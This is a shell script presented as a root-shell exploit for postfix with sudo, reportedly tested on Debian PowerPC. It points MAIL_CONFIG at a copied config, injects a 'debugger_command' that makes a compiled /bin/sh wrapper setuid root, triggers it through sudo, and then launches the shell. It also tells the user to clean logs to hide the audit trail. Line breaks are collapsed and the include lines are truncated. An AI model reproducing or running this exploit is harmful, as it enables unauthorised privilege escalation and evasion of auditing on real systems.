#!/bin/sh # # root shell exploit for postfix + sudo # tested on debian powerpc unstable # # by Charles 'core' Stevenson # Put your password here if you're not in the sudoers file set PASSWORD="wdnownz" echo -e "sudo exploit by core \n" echo "Setting up postfix config directory..." /bin/cp -r /etc/postfix /tmp cat >/tmp/sh.c < #include char *my_argv[] = { "/bin/sh", NULL }; char *my_envp[] = { NULL }; void main() { setuid(0); setgid(0); execve("/bin/sh",my_argv,my_envp); } EOF echo "Building suid wrapper..." gcc /tmp/sh.c -o /tmp/sh echo "Adding malicious debugger command..." echo "debugger_command = chown root.root /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf echo "Setting up environment..." export MAIL_CONFIG=/tmp/postfix export MAIL_DEBUG= sleep 2 echo "Trying to exploit..." echo -e "$PASSWORD\n"|/usr/bin/sudo su - sleep 2 echo "We should have a root shell let's check..." ls -l /tmp/sh echo "Cleaning up /tmp..." rm -rf /tmp/postfix /tmp/sh.c echo -e "\n!!! This leaves a big audit trail so cleanup the appropriate logs!\n" echo "Attempting to run root shell..." /tmp/sh

亚洲欧美在线